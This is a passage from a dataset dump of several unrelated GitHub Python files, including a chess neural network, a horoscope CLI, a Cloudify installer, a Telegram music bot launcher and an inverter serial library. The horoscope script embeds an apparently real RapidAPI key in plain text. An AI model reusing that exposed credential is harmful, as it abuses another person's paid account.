nn.BatchNorm2d(num_features=filters),\n nn.ReLU(),\n )\n\n self.res_blocks = nn.Sequential(*(ResBlock(filters) for _ in range(res_blocks)))\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(\n in_channels=filters,\n out_channels=policy_channels,\n kernel_size=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=policy_channels),\n nn.ReLU(),\n nn.Flatten(),\n nn.Linear(in_features=policy_channels * 8 * 8, out_features=1880),\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(\n in_channels=filters,\n out_channels=value_channels,\n kernel_size=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=value_channels),\n nn.ReLU(),\n nn.Flatten(),\n nn.Linear(in_features=value_channels * 8 * 8, out_features=value_fc_hidden),\n nn.ReLU(),\n nn.Linear(in_features=value_fc_hidden, out_features=1),\n nn.Tanh(),\n )\n\n def forward(self, x):\n x = self.convblock(x)\n x = self.res_blocks(x)\n return self.policy_head(x), self.value_head(x)\n\n def training_step(self, batch, batch_idx):\n x, (y_policy, y_value) = batch\n batch_len = len(x)\n\n y_hat_policy, y_hat_value = self(x)\n\n policy_loss = F.cross_entropy(y_hat_policy, y_policy)\n value_loss = F.mse_loss(y_hat_value, y_value)\n cumulative_loss = policy_loss + value_loss\n\n policy_accuracy = (\n (y_hat_policy.argmax(1) == y_policy).float().sum().item()\n ) / batch_len\n\n self.log_dict(\n {\n \"train/policy_accuracy\": policy_accuracy,\n \"train/policy_loss\": policy_loss,\n \"train/value_loss\": value_loss,\n \"train/cumulative_loss\": 
cumulative_loss,\n }\n )\n\n return cumulative_loss\n\n def validation_step(self, batch, batch_idx):\n x, (y_policy, y_value) = batch\n batch_len = len(x)\n y_hat_policy, y_hat_value = self(x)\n\n policy_accuracy = (\n (y_hat_policy.argmax(1) == y_policy).float().sum().item()\n ) / batch_len\n\n self.log_dict(\n {\n \"validation/policy_accuracy\": policy_accuracy,\n \"validation/policy_loss\": F.cross_entropy(\n y_hat_policy, y_policy\n ).item(),\n \"validation/value_loss\": F.mse_loss(y_hat_value, y_value).item(),\n }\n )\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n scheduler = StepLR(\n optimizer, step_size=1, gamma=self.lr_scheduler_gamma, verbose=True\n )\n return {\n \"optimizer\": optimizer,\n \"lr_scheduler\": {\n \"scheduler\": scheduler,\n \"interval\": \"step\",\n \"frequency\": self.lr_scheduler_freq,\n },\n }\n\n def eval_by_network(self, board: chess.Board):\n board_tensor = board_to_tensor(board)\n get_prob = extract_prob_from_policy\n\n with torch.no_grad():\n raw_policy, raw_value = self(\n torch.from_numpy(board_tensor).reshape((1, 18, 8, 8)).to(self.device)\n )\n\n outcome_logits = raw_value[0].cpu().item()\n outcomes_probs = dummy_wdl(outcome_logits)\n\n policy = raw_policy[0].cpu()\n\n moves = list(board.legal_moves)\n move_logits = [get_prob(policy, move, not board.turn) for move in moves]\n\n move_priors = softmax(np.array(move_logits))\n priors = dict(zip(moves, move_priors))\n\n return priors, outcomes_probs\n\n def raw_evaluate(self, board: chess.Board):\n board_tensor = board_to_tensor(board)\n get_prob = extract_prob_from_policy\n\n with torch.no_grad():\n raw_policy, raw_value = self(\n torch.from_numpy(board_tensor).reshape((1, 18, 8, 8)).to(self.device)\n )\n\n outcome_logits = raw_value[0].cpu().item()\n\n policy = raw_policy[0].cpu()\n\n moves = list(board.legal_moves)\n move_logits = [get_prob(policy, move, not board.turn) for move in moves]\n\n move_priors = softmax(np.array(move_logits))\n priors = dict(zip(moves, move_priors))\n\n return priors, outcome_logits\n\n def evaluate(self, board: chess.Board):\n result = board.result(claim_draw=True)\n if result == \"*\":\n # Game is not ended\n # evaluate by using ANN\n priors, value_estimate = self.raw_evaluate(board)\n elif result == \"1/2-1/2\":\n # It's already draw\n # or we can claim draw, anyway `value_estimate` is 0.0\n # TODO: should I set priors = {}?\n # It's logical to set it empty because there is no need\n # to calculate deeper already draw position,\n # but with low time/nodes search, it leads to\n # empty node.children bug\n priors, _ = self.raw_evaluate(board)\n value_estimate = 0.0\n else:\n # result == '1-0' or result == '0-1'\n # we are checkmated because it's our turn to move\n # so the `value_estimate` is -1.0\n priors = {} # no moves after checkmate\n value_estimate = -1.0\n return priors, value_estimate\n\n\nif __name__ == \"__main__\":\n net = AlphaNet()\n\n x = torch.zeros((6, 18, 8, 8))\n policy, value = net(x)\n print(policy.shape, value.shape)\n","repo_name":"DinoraProject/dinora_chess","sub_path":"dinora/models/alphanet.py","file_name":"alphanet.py","file_ext":"py","file_size_in_byte":11063,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"13428048308","text":"import os\nimport socket\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nSERVICE_NAME = os.getenv(\"SERVICE_NAME\")\nSERVICE_ENV = os.getenv(\"SERVICE_ENV\")\n\nLOGGING_CONFIG = {\n \"version\": 
1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"papertrail\": {\n \"format\": f\"%(asctime)s - {SERVICE_NAME}_{SERVICE_ENV} - %(levelname)s - %(name)s - %(message)s\",\n \"datefmt\": '%Y-%m-%d %H:%M:%S %Z',\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"DEBUG\",\n \"formatter\": \"papertrail\",\n \"stream\": \"ext://sys.stdout\"\n }\n },\n \"loggers\": {\n \"\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\"console\"]\n }\n }\n}\n","repo_name":"ash-ishh/CSPostsCompiler","sub_path":"logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74229396642","text":"import requests\n\n\ndef get_info(sign, day):\n \"\"\"This function makes the API call to get the result\n of the desired zodiac sign for the desired day.\"\"\"\n\n base_url = \"https://sameer-kumar-aztro-v1.p.rapidapi.com/\"\n\n parameters = {\"sign\": sign, \"day\": day}\n\n headers = {'x-rapidapi-host': \"sameer-kumar-aztro-v1.p.rapidapi.com\",\n 'x-rapidapi-key':\n \"9b63804a3cmsh368b3af884ede93p1e0b5djsn7ebb3eb30986\"}\n\n robj = requests.post(base_url, headers=headers, params=parameters)\n return_object = robj.json()\n if robj.status_code == 200:\n res = f'''We see that you are {sign.capitalize()}. Your horoscope for the date\n {return_object['current_date']} says that : '{return_object[\"description\"]}'\\n\n You are compatible with {return_object[\"compatibility\"]}. Your lucky color,\n number and time are {return_object[\"color\"]}, {return_object[\"lucky_number\"]}\n and {return_object[\"lucky_time\"]} respectively.\\n\n You are expected to be in '{return_object[\"mood\"]}' mood.'''\n\n return res\n else:\n return \"Sorry! No result found.\"\n\n\ndef bad_input(container, code):\n \"\"\"This function is used to handle bad user input and gives the user a choice\n to either QUIT the game or enter a valid input.\"\"\"\n\n print(\"\\nThis is NOT a valid entry.\")\n yn = input(\"Are you requesting to QUIT? (press y / n) : \")\n if yn == 'y':\n print(\"\\nThankyou for holding up!\\n\")\n return 1\n elif yn == 'n':\n print(\"\\nPlease enter a valid number.\\n\")\n return 0\n else:\n print(\"\\nBad Input Again!\\nBye Bye.\\n\")\n return 1\n\n\ndef main():\n \"\"\"This function displays the complete menu to the user and asks\n for user input. It also invokes bad_input() function in case of\n an invalid entry by the user. It then invokes the get_info() function\n to collect the required result and print it.\"\"\"\n\n info_zodiac = '''\n Hello and Welcome to your Horoscope Destination!\\n\\n\n Select your Zodiac Sign from the list below. Press the code\n along the Sign to proceed.\\n\n 1. Aries\n 2. Taurus\n 3. Gemini\n 4. Cancer\n 5. Leo\n 6. Virgo\n 7. Libra\n 8. Scorpio\n 9. Sagittarius\n 10. Capricorn\n 11. Aquarius\n 12. Pisces\n Press any other character to QUIT.\\n'''\n\n info_day = '''\n Which day's horoscope are you looking for?\\n\n 1. Yesterday\n 2. Today\n 3. 
Tomorrow\n Press any other character to QUIT.\\n'''\n\n zodiac = {'1': 'aries', '2': 'taurus', '3': 'gemini',\n '4': 'cancer', '5': 'leo', '6': 'virgo', '7': 'libra',\n '8': 'scorpio', '9': 'sagittarius', '10': 'capricorn',\n '11': 'aquarius', '12': 'pisces'}\n day = {'1': \"yesterday\", '2': \"today\", '3': \"tomorrow\"}\n\n zodiac_code, day_code = 0, 0\n\n print(info_zodiac)\n\n while True:\n\n while True:\n zodiac_code = input(\"Press the zodiac code : \")\n if not zodiac.get(zodiac_code, 0):\n if bad_input(zodiac, zodiac_code):\n return\n else:\n continue\n break\n\n print(info_day)\n\n while True:\n day_code = input(\"Press the day code : \")\n if not day.get(day_code, 0):\n if bad_input(day, day_code):\n return\n else:\n continue\n break\n result = get_info(zodiac[zodiac_code], day[day_code])\n print(f'\\n\\nWe have an astro prediction for you!\\n\\n\" {result} \"\\n')\n\n\nif __name__ == '__main__':\n \"\"\"The main driver code.\"\"\"\n main()\n","repo_name":"python-geeks/Automation-scripts","sub_path":"horoscope_destination/horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":719,"dataset":"github-code","pt":"54"} +{"seq_id":"15515477542","text":"\"\"\"\nEvolution of 3D human skeleton.\nauthor: Nicholas Li\ncontact: nicholas.li@connect.ust.hk\n\"\"\"\nimport sys\nsys.path.append(\"../\")\n\nfrom libs.evolution.genetic import evolution\nfrom libs.evolution.parameter import parse_arg\n\nimport os\nimport logging\nfrom scipy.spatial.transform import Rotation as R\nimport numpy as np\n\ndef cast_to_float(dic, dtype=np.float32):\n # cast to float 32 for space saving\n for key in dic.keys():\n dic[key] = dic[key].astype(dtype)\n return dic\n\ndef random_rotation(pose, sigma=360):\n # apply random rotation to equivalently augment viewpoints\n pose = pose.reshape(32, 3)\n hip = pose[0].copy().reshape(1, 3)\n x = np.random.normal(scale=sigma)\n y = np.random.normal(scale=sigma)\n z = np.random.normal(scale=sigma)\n r = R.from_euler('xyz', [x, y, z], degrees=True)\n rotated = r.as_dcm() @ (pose-hip).T\n return (rotated.T + hip).reshape(-1)\n\ndef initialize_population(data_dic, opt):\n \"\"\"\n Initialize a population for later evolution.\n \"\"\"\n # down-sample the raw data if used for weakly-supervised experiments\n if opt.WS and opt.SS.startswith(\"0.\") and opt.SS.endswith(\"S1\"):\n # a fraction of S1 data for H36M\n ratio = float(opt.SS.split('S')[0])\n # randomly sample a portion of 3D data\n sampled_dic = {}\n # sample each video\n for key in data_dic.keys():\n if key[0] != 1:\n continue\n total = len(data_dic[key])\n sampled_num = int(ratio*total)\n chosen_indices = np.random.choice(total, sampled_num, replace=False)\n sampled_dic[key] = data_dic[key][chosen_indices].copy()\n initial_population = np.concatenate(list(sampled_dic.values()), axis=0) \n elif opt.WS and opt.SS.startswith(\"S\"):\n # a collection of data from a few subjects\n # delete unused subjects\n sub_list = [int(opt.SS[i]) for i in range(1, len(opt.SS))]\n keys_to_delete = []\n for key in data_dic.keys():\n if key[0] not in sub_list:\n keys_to_delete.append(key)\n for key in keys_to_delete: \n del data_dic[key] \n initial_population = np.concatenate(list(data_dic.values()), axis=0) \n else:\n # do not perform down-sampling\n initial_population = np.concatenate(list(data_dic.values()), axis=0) \n return initial_population\n\ndef initialize_model_file(opt):\n if opt.A:\n import torch\n model = 
torch.load(os.path.join(opt.ckpt_dir, \"model.th\"))\n stats = np.load(os.path.join(opt.ckpt_dir, \"stats.npy\")).item()\n cameras = np.load(\"../data/human3.6M/cameras.npy\").item()\n model_file = {\"model\":model, \"stats\":stats, \"cams\":list(cameras.values())}\n else:\n model_file = None \n return model_file\n\n\ndef split_and_save(evolved_population):\n \"\"\"\n Split and save the evolved dataset into training and validation set.\n \"\"\"\n training_indices = np.random.choice(len(evolved_population), int(0.95*len(evolved_population)), replace=False)\n testing_indices = np.delete(np.arange(len(evolved_population)), training_indices)\n training_poses = evolved_population[training_indices]\n testing_poses = evolved_population[testing_indices]\n\n temp_subject_list = [1, 5, 6, 7, 8]\n train_set_3d = {}\n poses_list = np.array_split(training_poses, len(temp_subject_list))\n for subject_idx in range(len(temp_subject_list)):\n train_set_3d[(temp_subject_list[subject_idx], 'n/a', 'n/a')] =\\\n poses_list[subject_idx] \n # testing\n testing_poses = evolved_population[testing_indices]\n temp_subject_list = [9,11]\n test_set_3d = {}\n poses_list = np.array_split(testing_poses, len(temp_subject_list))\n for subject_idx in range(len(temp_subject_list)):\n test_set_3d[(temp_subject_list[subject_idx], 'n/a', 'n/a')] =\\\n poses_list[subject_idx] \n np.save('../data/human3.6M/h36m/numpy/threeDPose_train_split.npy', train_set_3d)\n np.save('../data/human3.6M/h36m/numpy/threeDPose_test.npy', test_set_3d) \n return\n\ndef visualize(initial_population, evolved_population):\n \"\"\"\n Visualize the augmented dataset\n \"\"\"\n import matplotlib.pyplot as plt\n from genetic import show3Dpose\n def get_zmin(pose):\n return pose.reshape(32,3)[:,2].min()\n # initial population\n chosen_indices = np.random.choice(len(initial_population), 9, replace=False)\n plt.figure()\n for idx in range(9):\n ax = plt.subplot(3, 3, idx+1, projection='3d')\n pose = initial_population[chosen_indices[idx]]\n show3Dpose(pose, ax) \n plt.title(\"{:d}:{:.2f}\".format(chosen_indices[idx], get_zmin(pose)))\n plt.tight_layout() \n # after evolution\n chosen_indices = np.random.choice(len(evolved_population) - len(initial_population), 9, replace=False)\n plt.figure()\n for idx in range(9):\n ax = plt.subplot(3, 3, idx+1, projection='3d')\n pose = evolved_population[chosen_indices[idx] + len(initial_population)]\n show3Dpose(pose, ax) \n plt.title(\"{:d}:{:.2f}\".format(chosen_indices[idx] + len(initial_population), get_zmin(pose)))\n plt.tight_layout() \n return\n\ndef main():\n logging.basicConfig(level=logging.INFO,\n format=\"[%(asctime)s]: %(message)s\"\n ) \n # parse command line input\n opt = parse_arg() \n if opt.generate:\n # get the training set of human 3.6M \n data_dic = np.load(opt.data_path, allow_pickle=True).item()\n initial_population = initialize_population(data_dic, opt)\n # load a pre-trained model for active searching (optional)\n model_file = initialize_model_file(opt) \n evolved_population = evolution(initial_population,\n opt,\n model_file=model_file\n ) \n if opt.split:\n split_and_save(evolved_population)\n \n if opt.visualize:\n visualize(initial_population, evolved_population)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Nicholasli1995/EvoSkeleton","sub_path":"tools/evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"54"} +{"seq_id":"28876304105","text":"def 
jumpingOnClouds(c):\n # Write your code here\n cloud = 0\n jump = 0\n while cloud < len(c)-2:\n jump += 1\n if c[cloud+2] == 1:\n cloud = cloud + 1\n else:\n cloud = cloud + 2\n \n if cloud == len(c)-2:\n jump = jump + 1\n \n return jump\n","repo_name":"SachinRatnam/HackerRank","sub_path":"Problem Solving/Jumping on the Clouds/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30520475080","text":"import os\nimport platform\nimport subprocess\nfrom cloudify import ctx\nfrom cloudify.exceptions import (\n NonRecoverableError, HttpException, OperationRetry\n)\n\n\ndef execute_command(command, extra_args=None):\n\n ctx.logger.debug('command: {0}.'.format(repr(command)))\n\n subprocess_args = {\n 'args': command,\n 'stdout': subprocess.PIPE,\n 'stderr': subprocess.PIPE\n }\n if extra_args is not None and isinstance(extra_args, dict):\n subprocess_args.update(extra_args)\n\n ctx.logger.debug('subprocess_args {0}.'.format(subprocess_args))\n\n process = subprocess.Popen(**subprocess_args)\n output, error = process.communicate()\n\n ctx.logger.debug('command: {0} '.format(repr(command)))\n ctx.logger.debug('output: {0} '.format(output))\n ctx.logger.debug('error: {0} '.format(error))\n ctx.logger.debug('process.returncode: {0} '.format(process.returncode))\n\n if process.returncode:\n ctx.logger.error('Running `{0}` returns {1} error: {2}.'\n .format(repr(command), process.returncode,\n repr(error)))\n return False\n\n return output\n\n\ndef download_service(service_name):\n service_path = \"/usr/bin/\" + service_name\n if not os.path.isfile(service_path):\n cfy_binary = ctx.download_resource('resources/{}'\n .format(service_name))\n ctx.logger.debug('{} downloaded.'.format(service_name))\n if execute_command(['sudo', 'cp', cfy_binary, service_path]) is False:\n raise NonRecoverableError(\"Can't copy {}.\".format(service_path))\n # fix file attributes\n if execute_command(['sudo', 'chmod', '555', service_path]) is False:\n raise NonRecoverableError(\"Can't chmod {}.\".format(service_path))\n if execute_command(['sudo', 'chown', 'root:root', service_path]) is False:\n raise NonRecoverableError(\"Can't chown {}.\".format(service_path))\n ctx.logger.debug('{} attributes fixed'.format(service_name))\n\n\nif __name__ == '__main__':\n full_install = ctx.node.properties.get('full_install', 'all')\n\n try:\n download_service(\"cfy-go\")\n if full_install == \"all\":\n # download cluster provider\n download_service(\"cfy-kubernetes\")\n\n # download scale tools\n download_service(\"cfy-autoscale\")\n except HttpException:\n ctx.logger.info('Installing build requirements.')\n linux_distro = ctx.node.properties.get('linux_distro', 'centos')\n\n if not linux_distro:\n distro, _, _ = \\\n platform.linux_distribution(full_distribution_name=False)\n linux_distro = distro.lower()\n\n if 'centos' in linux_distro:\n\n build_output = execute_command(['sudo', 'yum', 'install', '-q',\n '-y', 'git'])\n if build_output is False:\n raise OperationRetry('Failed to install git')\n\n import_gpg_key = execute_command([\n 'sudo', 'rpm', '--import',\n 'https://mirror.go-repo.io/centos/RPM-GPG-KEY-GO-REPO'])\n if import_gpg_key is False:\n raise OperationRetry('Failed to import Go GPG key')\n\n go_repo_temp = ctx.download_resource('resources/go.repo')\n execute_command(['sudo', 'mv', go_repo_temp,\n '/etc/yum.repos.d/go.repo'])\n\n go_install = execute_command(['sudo', 'yum', '-y', 'install',\n 
'golang'])\n if go_install is False:\n raise OperationRetry('Failed to import Go GPG key')\n\n elif 'ubuntu' in linux_distro:\n execute_command(['sudo', 'add-apt-repository',\n 'ppa:longsleep/golang-backports'])\n execute_command(['sudo', 'apt-get', 'update'])\n execute_command(['sudo', 'apt-get', 'install', 'golang-go', 'git'])\n else:\n raise NonRecoverableError('Unsupported platform.')\n","repo_name":"cloudify-incubator/cloudify-kubernetes-provider","sub_path":"examples/cluster_blueprint/scripts/buildtools/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"37110638774","text":"import os\n\nimport ScoreCalculation\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\nos.environ[\"SM_FRAMEWORK\"] = \"tf.keras\"\nfrom tensorflow import keras\n\nimport tensorflow as tf\n\nEUnets = [\"EUnet5-5-5\", \"EUnet5-5-4\", \"EUnet5-4-4\", \"EUnet5-5-3\", \"EUnet5-5-2\", \"EUnet5-4-3\", \"EUnet4-5-5\",\n \"EUnet4-4-4\", \"EUnet4-4-2\", \"EUnet4-4-1\", \"EUnet4-3-2\", \"EUnet3-3-3\"]\nAllNueralNetworks = [\"VGGU19net\", \"ResNextUnet\", \"ResUnet\", \"Inceptionv3\", \"inceptionresnetv2\", \"EUnet5-5-3\",\n \"Unet2plus\", \"Unet3plus\", \"Unet\", \"EUnetVGG19_5-4-1_FinalVersion_Shear_Dropout0.1_FinalDropout0.5\",\n \"EUnetVGG19_5-3-2(3Dropout)\"]\n\n\ndef load_model(name_path, type):\n if (type == \"EUnets\"):\n model = keras.models.load_model(\"EUnets/\" + name_path + '.hdf5',\n custom_objects={'bce_dice_loss': ScoreCalculation.bce_dice_loss,\n 'iou': ScoreCalculation.iou,\n 'dice_coef': ScoreCalculation.dice_coef, 'tf': tf})\n return model\n elif (type == \"All\"):\n model = keras.models.load_model(\"New_modelsWithoutDropout/\" + name_path + '.hdf5',\n custom_objects={'bce_dice_loss': ScoreCalculation.bce_dice_loss,\n 'iou': ScoreCalculation.iou,\n 'dice_coef': ScoreCalculation.dice_coef, 'tf': tf})\n return model\n","repo_name":"Kas-ES/Bachelor_Project_ComputerVision","sub_path":"LoadModels.py","file_name":"LoadModels.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23413960451","text":"import asyncio\nimport importlib\n\nfrom pyrogram import idle\nfrom pytgcalls.exceptions import NoActiveGroupCall\n\nimport config\nfrom AnonXMusic import LOGGER, app, userbot\nfrom AnonXMusic.core.call import Anony\nfrom AnonXMusic.misc import sudo\nfrom AnonXMusic.plugins import ALL_MODULES\nfrom AnonXMusic.utils.database import get_banned_users, get_gbanned\nfrom config import BANNED_USERS\n\n\nasync def init():\n if (\n not config.STRING1\n and not config.STRING2\n and not config.STRING3\n and not config.STRING4\n and not config.STRING5\n ):\n LOGGER(__name__).error(\"Assistant client variables not defined, exiting...\")\n exit()\n await sudo()\n try:\n users = await get_gbanned()\n for user_id in users:\n BANNED_USERS.add(user_id)\n users = await get_banned_users()\n for user_id in users:\n BANNED_USERS.add(user_id)\n except:\n pass\n await app.start()\n for all_module in ALL_MODULES:\n importlib.import_module(\"AnonXMusic.plugins\" + all_module)\n LOGGER(\"AnonXMusic.plugins\").info(\"تم استدعاء المودات بنجاح...\")\n await userbot.start()\n await Anony.start()\n try:\n await Anony.stream_call(\"https://telegra.ph/file/18eb1dfc2790e12ada2bc.jpg\")\n except NoActiveGroupCall:\n LOGGER(\"AnonXMusic\").error(\n \"من فضلك اطفئ مكالمة الفيديو في 
جروب اللوج\\القناة.\\n\\nجار ايقاف البوت...\"\n )\n exit()\n except:\n pass\n await Anony.decorators()\n LOGGER(\"AnonXMusic\").info(\n \"\\x41\\x6e\\x6f\\x6e\\x58\\x20\\x4d\\x75\\x73\\x69\\x63\\x20\\x42\\x6f\\x74\\x20\\x53\\x74\\x61\\x72\\x74\\x65\\x64\\x20\\x53\\x75\\x63\\x63\\x65\\x73\\x73\\x66\\x75\\x6c\\x6c\\x79\\x2e\\n\\n\\x44\\x6f\\x6e'\\x74\\x20\\x66\\x6f\\x72\\x67\\x65\\x74\\x20\\x74\\x6f\\x20\\x76\\x69\\x73\\x69\\x74\\x20\\x40\\x46\\x61\\x6c\\x6c\\x65\\x6e\\x41\\x73\\x73\\x6f\\x63\\x69\\x61\\x74\\x69\\x6f\\x6e\"\n )\n await idle()\n await app.stop()\n await userbot.stop()\n LOGGER(\"AnonXMusic\").info(\"Stopping AnonX Music Bot...\")\n\n\nif __name__ == \"__main__\":\n asyncio.get_event_loop().run_until_complete(init())\n","repo_name":"mahmoud-gg/anon1","sub_path":"AnonXMusic/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17266159195","text":"\"\"\"\nMPP Solar Inverter Command Library\nreference library of serial commands (and responses) for PIP-4048MS inverters\nmppinverter.py\n\"\"\"\n\nimport serial\nimport time\nimport re\nimport logging\nimport json\nimport glob\nimport os\nfrom os import path\n\n# from builtins import bytes\n\nfrom .mppcommand import mppCommand\n\nlog = logging.getLogger('MPP-Solar')\n\n\nclass MppSolarError(Exception):\n pass\n\n\nclass NoDeviceError(MppSolarError):\n pass\n\n\nclass NoTestResponseDefined(MppSolarError):\n pass\n\n\ndef getDataValue(data, key):\n \"\"\"\n Get value from data dict (loaded from JSON) or return empty String\n \"\"\"\n if key == 'regex':\n if 'regex' in data and data['regex']:\n return re.compile(data['regex'])\n else:\n return None\n if key in data:\n return data[key]\n else:\n return \"\"\n\n\ndef isInverterSupported(inverter_model, json):\n \"\"\"\n Determine if the command loaded from json supports the supplied inverter\n \"\"\"\n supports = getDataValue(json, 'supports')\n nosupports = getDataValue(json, 'nosupports')\n log.debug(\"-----No supports {}\".format(nosupports))\n # Some commands are specifically not supported by some models\n if inverter_model in nosupports:\n log.debug(\"Command {} not supported on inverter {}\".format(getDataValue(json, 'name'), inverter_model))\n return False\n # JSON command support all inverters unless specified\n if supports == \"\":\n log.debug(\"Command {} supported all inverters\".format(getDataValue(json, 'name')))\n return True\n elif inverter_model in supports:\n log.debug(\"Command {} supported by model {}\".format(getDataValue(json, 'name'), inverter_model))\n return True\n else:\n return False\n\n\ndef getCommandsFromJson(inverter_model):\n \"\"\"\n Read in all the json files in the commands subdirectory\n this builds a list of all valid commands\n \"\"\"\n log.info(\"Loading commands for inverter model: {}\".format(inverter_model))\n COMMANDS = []\n here = path.abspath(path.dirname(__file__))\n files = glob.glob(here + '/commands/*.json')\n if inverter_model == 'PI18':\n protocol = 'PI18'\n else:\n protocol = None\n\n for file in sorted(files):\n log.debug(\"Loading command information from {}\".format(file))\n with open(file) as f:\n try:\n data = json.load(f)\n except Exception:\n log.debug(\"Error processing JSON in {}\".format(file))\n continue\n # Does this json support the supplied inverter model?\n if isInverterSupported(inverter_model, data):\n log.info(\"... 
command {} loaded for inverter model: {}\".format(getDataValue(data, 'name'), inverter_model))\n COMMANDS.append(mppCommand(getDataValue(data, 'name'), getDataValue(data, 'description'),\n getDataValue(data, 'type'), getDataValue(data, 'response'),\n getDataValue(data, 'test_responses'), getDataValue(data, 'regex'),\n help=getDataValue(data, 'help'), crc_function=getDataValue(data, 'crc'), prefix=getDataValue(data, 'prefix'), protocol=protocol))\n return COMMANDS\n\n\ndef isTestDevice(serial_device):\n \"\"\"\n Determine if this instance is just a Test connection\n \"\"\"\n if serial_device == 'TEST':\n return True\n return False\n\n\ndef isDirectUsbDevice(serial_device):\n \"\"\"\n Determine if this instance is using direct USB connection\n (instead of a serial connection)\n \"\"\"\n if not serial_device:\n return False\n match = re.search(\"^.*hidraw\\\\d$\", serial_device)\n if match:\n log.debug(\"Device matches hidraw regex\")\n return True\n match = re.search(\"^.*mppsolar\\\\d$\", serial_device)\n if match:\n log.debug(\"Device matches mppsolar regex\")\n return True\n return False\n\n\nclass mppInverter:\n \"\"\"\n MPP Solar Inverter Command Library\n - represents an inverter (and the commands the inverter supports)\n \"\"\"\n\n def __init__(self, serial_device=None, baud_rate=2400, inverter_model='standard'):\n if not serial_device:\n raise NoDeviceError(\"A device to communicate by must be supplied, e.g. /dev/ttyUSB0\")\n self._baud_rate = baud_rate\n self._serial_device = serial_device\n self._inverter_model = inverter_model\n self._serial_number = None\n self._test_device = isTestDevice(serial_device)\n self._direct_usb = isDirectUsbDevice(serial_device)\n self._commands = getCommandsFromJson(inverter_model)\n\n def __str__(self):\n \"\"\"\n \"\"\"\n inverter = \"\\n\"\n if self._direct_usb:\n inverter = \"Inverter connected via USB on {}\".format(self._serial_device)\n elif self._test_device:\n inverter = \"Inverter connected as a TEST\"\n else:\n inverter = \"Inverter connected via serial port on {}\".format(self._serial_device)\n inverter += \"\\n-------- List of supported commands --------\\n\"\n if self._commands:\n for cmd in self._commands:\n inverter += str(cmd)\n return inverter\n\n def getSerialNumber(self):\n if self._serial_number is None:\n result = self.execute(\"QID\")\n # print (result)\n if result:\n response = result.getResponseDict()\n # print (byte_response)\n if response:\n self._serial_number = response[\"serial_number\"][0]\n return self._serial_number\n\n def getAllCommands(self):\n \"\"\"\n Return list of defined commands\n \"\"\"\n return self._commands\n\n def getResponse(self, cmd):\n \"\"\"\n Execute command and return the byte_response\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getResponse()\n\n def getInfluxLineProtocol2(self, cmd):\n \"\"\"\n Execute command and return the reponse as a Influx Line Protocol messages\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getInfluxLineProtocol2()\n\n def getInfluxLineProtocol(self, cmd):\n \"\"\"\n Execute command and return the reponse as a Influx Line Protocol messages\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getInfluxLineProtocol()\n\n def getResponseDict(self, cmd):\n \"\"\"\n Execute command and return the reponse as a dict\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getResponseDict()\n\n def 
_getCommand(self, cmd):\n \"\"\"\n Returns the mppcommand object of the supplied cmd string\n \"\"\"\n log.debug(\"Searching for cmd '{}'\".format(cmd))\n if not self._commands:\n log.debug(\"No commands found\")\n return None\n for command in self._commands:\n if not command.regex:\n if cmd == command.name:\n return command\n else:\n match = command.regex.match(cmd)\n if match:\n # log.debug(command.name, command.regex)\n log.debug(\"Matched: {} Value: {}\".format(command.name, match.group(1)))\n command.setValue(match.group(1))\n return command\n return None\n\n def _doTestCommand(self, command):\n \"\"\"\n Performs a test command execution\n \"\"\"\n command.clearByteResponse()\n log.debug('Performing test command with %s', command)\n command.setByteResponse(command.getTestByteResponse())\n return command\n\n def _doSerialCommand(self, command):\n \"\"\"\n Opens serial connection, sends command (multiple times if needed)\n and returns the byte_response\n \"\"\"\n command.clearByteResponse()\n response_line = None\n log.debug('port %s, baudrate %s', self._serial_device, self._baud_rate)\n try:\n with serial.serial_for_url(self._serial_device, self._baud_rate) as s:\n # Execute command multiple times, increase timeouts each time\n for x in range(1, 5):\n log.debug('Command execution attempt %d...', x)\n s.timeout = 1 + x\n s.write_timeout = 1 + x\n s.flushInput()\n s.flushOutput()\n s.write(command.byte_command)\n time.sleep(0.5 * x) # give serial port time to receive the data\n response_line = s.readline()\n log.debug('serial byte_response was: %s', response_line)\n command.setByteResponse(response_line)\n return command\n except Exception as e:\n log.warning(\"Serial read error: {}\".format(e))\n log.info('Command execution failed')\n return command\n\n def _doDirectUsbCommand(self, command):\n \"\"\"\n Opens direct USB connection, sends command (multiple times if needed)\n and returns the byte_response\n \"\"\"\n command.clearByteResponse()\n response_line = bytes()\n usb0 = None\n try:\n usb0 = 